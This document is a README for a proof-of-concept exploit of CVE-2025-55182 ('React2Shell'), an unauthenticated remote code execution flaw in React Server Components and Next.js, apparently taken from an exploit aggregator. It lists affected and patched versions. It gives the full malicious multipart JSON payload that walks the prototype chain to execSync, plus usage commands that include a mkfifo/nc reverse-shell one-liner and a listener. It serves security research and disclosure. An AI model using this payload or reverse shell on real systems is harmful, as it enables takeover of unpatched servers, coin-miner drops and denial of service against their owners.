Share
## https://sploitus.com/exploit?id=AF0210F2-070D-59BB-9EEC-16AB1F11A773
# react2shell-poc

Proof-of-concept exploit for **CVE-2025-55182** ("React2Shell"), a critical
(CVSS **10.0**) unauthenticated remote code execution vulnerability in
React Server Components, exploitable in any Next.js app using the App
Router / Server Actions.

> โš ๏ธ **Security research / educational use only.** See [Legal](#legal--responsible-use) below.

## What it is

CVE-2025-55182 lives in the RSC "Flight" protocol's reply deserializer.
By POSTing a crafted `multipart/form-data` body with a `Next-Action`
header, an unauthenticated attacker can walk the prototype chain
(`$1:__proto__:then`, then `$1:constructor:constructor`) to reach the
`Function` constructor and get arbitrary code executed inside the target
Node.js process.

No application-defined Server Action needs to exist for this to work โ€” a
default, unmodified `create-next-app` project is exploitable out of the
box, because the flaw is in the framework's request handling, not in any
specific app code.

Publicly disclosed 2025-12-03. Exploitation in the wild (mostly coin
miners dropped by opportunistic scanners) was observed within 48 hours of
disclosure.

### Affected versions

| Package | Vulnerable |
|---|---|
| React   | 19.0.0, 19.1.0โ€“19.1.1, 19.2.0 |
| Next.js | 15.0.0โ€“15.0.4, 15.1.0โ€“15.1.8, 15.2.0โ€“15.2.5, 16.0.0โ€“16.0.6 |

### Patched versions

| Package | Patched |
|---|---|
| React   | โ‰ฅ 19.3.0 |
| Next.js | โ‰ฅ 15.0.5, โ‰ฅ 15.1.9, โ‰ฅ 15.2.6, โ‰ฅ 16.0.7 |

If you maintain a Next.js app, update now โ€” see the [official React
advisory](https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components).

## Usage

```bash
pip install -r requirements.txt

# Run a command and print the response
python3 react2shell_rce.py http://target:3000 "id"

# Default command is "id" if none is given
python3 react2shell_rce.py http://target:3000

# Get a reverse shell (any long-running / non-exiting command will make
# the HTTP request time out - that's the expected signal, not a failure)
python3 react2shell_rce.py http://target:3000 "rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc   >/tmp/f"
```

Start a listener first: `nc -lvnp `.

### A note on the "timeout = success" signal

`execSync()` in the target Node process is **synchronous** โ€” it blocks
the whole (single-threaded) event loop until the injected command exits.
A command that never exits on its own (an interactive shell, `sleep`,
etc.) will make the HTTP request hang, which is why a `ReadTimeout` here
generally means the command *did* run. It also means that while such a
command is running, **the whole target application stops responding to
every other request** โ€” don't fire this in a loop without cleaning up
the previous shell first, or you'll leave the target hung.

## How the payload works

The malicious multipart field `"0"` (see `build_field0()` in
`react2shell_rce.py`) is:

```json
{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "process.mainModule.require('child_process').execSync('');",
    "_formData": { "get": "$1:constructor:constructor" }
  }
}
```

paired with field `"1"` containing the literal string `"$@0"` (a Flight
protocol back-reference into field `"0"`), sent with header
`Next-Action: x`. The `$1:__proto__:then` / `$1:constructor:constructor`
references are what walk the prototype chain up to `Function`, letting
the attacker-controlled `_prefix` string run as code.

The command is escaped with `json.dumps()` rather than hand-rolled string
substitution, so it's always valid JSON no matter what characters
(quotes, backslashes, etc.) the command contains.

## Credits / sources

This script is my own reconstruction of the payload, built from the
technical write-ups published by:

- [Datadog Security Labs](https://securitylabs.datadoghq.com/articles/cve-2025-55182-react2shell-remote-code-execution-react-server-components/)
- [OffSec](https://www.offsec.com/blog/cve-2025-55182/)

Both independently document essentially the same payload; the version
here fixes a subtle bug present in at least one other public shell-script
PoC that hand-escapes the JSON (any command containing `'` or `"` breaks
its JSON encoding).

Background / disclosure context:

- [Official React security advisory](https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components)
- [CVE Record](https://vulners.com/cve/CVE-2025-55182)

## Legal / responsible use

This tool is provided for **authorized security testing, CTF
competitions, and educational research only** โ€” for example, testing
your own infrastructure, or machines you have explicit permission to
attack (such as HackTheBox / TryHackMe labs).

Do **not** run this against systems you do not own or do not have
explicit written authorization to test. Unauthorized access to computer
systems is illegal in most jurisdictions. The author assumes no
liability for misuse.